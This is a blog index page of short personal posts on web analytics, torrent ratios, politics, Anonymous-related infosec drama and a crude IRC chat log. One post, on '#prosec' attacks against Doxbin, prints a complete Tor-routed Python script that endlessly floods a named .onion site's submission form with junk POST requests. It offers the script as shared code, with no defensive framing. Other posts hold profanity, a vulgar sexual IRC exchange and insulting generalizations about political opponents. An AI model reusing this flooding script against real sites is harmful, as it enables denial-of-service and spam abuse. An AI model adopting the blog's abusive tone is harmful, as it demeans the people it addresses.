Google = Big Brother

I’ve been toying around with Google Analytics, and I’ve found some pretty interesting stuff. It actually flies beyond the border of creepy and flatly allows you to “stalk your stalkers”. They might as well coin the term “counter-stalking”, because they allow you to watch everyone who views your website, their behavior, and you can even make web design decisions that are quite sound based on what you find in the data and how you interpret it. After nosing around a bit, I can tell you that if I really wanted my website to take off I’d cease blogging rants about how Obama sucks or why we shouldn’t interfere in Israel’s “issues” and instead just post five lolcats a day. That would be all it takes to make this website über-popular. Just lolcats. Mind you, I’m not going to do that. I’m going to do what I damn well please because I don’t blog to please others, I blog to please myself. So this crevice can remain solemnly unpopular for all the fucks I give. But just check out how creepy this “user interaction flow” is.

[Read more]

What.CD 20 GB Mark

I no longer care to hear about your “issues” with bittorrent. I’m nearing the 20GB uploaded mark on What.CD with a 48 kbps upstream. If you ask me, that’s an accomplishment on it’s own. So quit your bitching, there are people who have it worse than you. I make do, dammit. I think I do rather well with what I have.

Pic related.

What.CD Ratio

[Read more]

#Prosec Attacks on Doxbin

Looks like #prosec is nerdraging on @doxbin. The effects can be seen here. The attack I noticed first was a semi-lame HTTP POST attack that floods doxbin with garbage “dox”. Code here:

#!/usr/bin/python

import socks
#google it, it's a common python extension
import socket
#127.0.0.1:9050 is the default TOR socks4 proxy
#this connects to TOR
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, "127.0.0.1", 9050)
socket.socket = socks.socksocket
from httplib import *
from urllib import *
import random
import time
import hashlib

times = 1
while 1:
	############DOX############
	doxrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
	dox = hashlib.sha224(doxrand).hexdigest()
	print dox
	#doxrand = picking a random character
	#dox = SHA hashing of the random character defined in doxrand
	##############NAEM###########
	naemrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
	naem = hashlib.sha224(naemrand).hexdigest()
	print naem
	#same as above
	##############

	connection = HTTPConnection("doxbinumfxfyytnh.onion")
	#establishing HTTP conenction to website
	head = {"Content-Type" : "application/x-www-form-urlencoded", "Accept" : "text/plain"}
	#constructing the header, so the webserver will respond properly
	parameters = urlencode({"naem" : naem, "dox" : dox})
	#defining the data to be used during POST, note naem and dox refer to the random strings from ealier
	#they must correspond to the ID fields from the web form, otherwise..it won't work
	connection.request("POST", "/post.php", parameters, head)
	#pushing the data to the post function of the php file
	print 'Connection OK...Continuing..'
	print 'Spammed', 
	print times, 
	print 'times!'
	times = times + 1
	time.sleep(30) #in seconds
	#self explanitory

Now, however, it looks like there are 403 Forbidden errors. I’m thinking Nachash will get things running again soon.

[Read more]

Obomney 2012

This facebook thread made me giggle a little. I have as friends some really hard pro-Bama people, and it’s interesting to see what flits across my facebook from day to day. I despise the Republican party for a lot of the reasons I despise Obama. They’re old-fashioned, backed entirely by greedy corporations, and favor iron-fist control over the people when it comes to security- not just at home but abroad as well. For reference, here are the links mentioned in the thread:

[Read more]

IRC is a Bad Place™

[18:44:05] <Aar0n> i fit a Sharpie up my urethra the other day
[18:44:11] <Burgina> hawt
[18:44:23] <o_o> eww
[18:44:29] <Aar0n> maybe thats why i pee black chunks
[18:44:38] <Aar0n> I fergot to put the cap on first
...
[18:45:29] <Aar0n> i found this killer vag mesh video anyone wanna see?
[18:45:33] <Burgina> yes
[18:45:47] <o_o> brb
[18:45:51] <Aar0n> naa ill be a good boy
[Read more]

Musings on Information Security

I’ve been thinking a lot lately about the “PsyOPS” and “InfoSec” professionals that are wildly chasing hackers all over the internet. People claim they’re so elite because they’re infiltrating A GROUP THAT ANYONE CAN JOIN, REGARDLESS OF RACE, CREED, OR RELIGION. I guess it’s tacitly not infiltration, as I’m sure some of the “legit” members don’t have the group’s best interest at heart, for various reasons. So if you’re claiming to be “Destroyer of Anonymous”, you fail at life. You’re a fucking loser- an asshat. The reality is that Anonymous is destroying itself. It swells and declines. It will always eliminate parts of itself. Kind of like pruning. No group with such radical and diverse beliefs can remain cohesive. However, all “#prosec” douchebags are typically Republican, Bradley Manning hating government suckups who shit on the first amendment and would love to see all Arab Americans die. These are not generalizations- these fucking nutbags still have sore tits over 9/11. At least, the “twitter vocal” ones are that way. It’s ironic. If you want to gain support for your cause of “hating Anonymous”, wouldn’t you be nicer than a nazi? My guess is “mudsplatter / hubris” is still on the #prosec side of the fence, hunting Anonymous down with PsyOPS and trolling. However, he’s playing good cop at the moment. The minds at Backtrace Security likely discovered that being raging douches from all angles doesn’t get you very far. So riding high on the crest of “namshub.pdf” and the fact that all their dox came from the fallout just before HBGary, they’re trying like Hell to prove they’re actually worth something to the internet, and not just screaming trolls.

[Read more]

Thanks!

Loot!

Thanks, Anonymous Benefactor! Got the package today, you crazy bastard. The shirt is quite suitable. At least this way people don’t even have to check my blog to determine that I’m an Infosec Troll.

I owe you one.

- Red Gingerface

[Read more]